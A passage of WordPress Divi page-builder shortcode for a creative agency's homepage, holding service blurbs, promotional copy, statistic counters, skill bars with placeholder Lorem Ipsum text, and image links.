button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding_last_edited=\"on|phone\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.png\" alt=\"Why We creative agency\" title_text=\"Why we\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"61px|||||\" custom_margin_tablet=\"\" custom_margin_phone=\"0px||||false|false\" custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.1\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.2\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||78px|\" 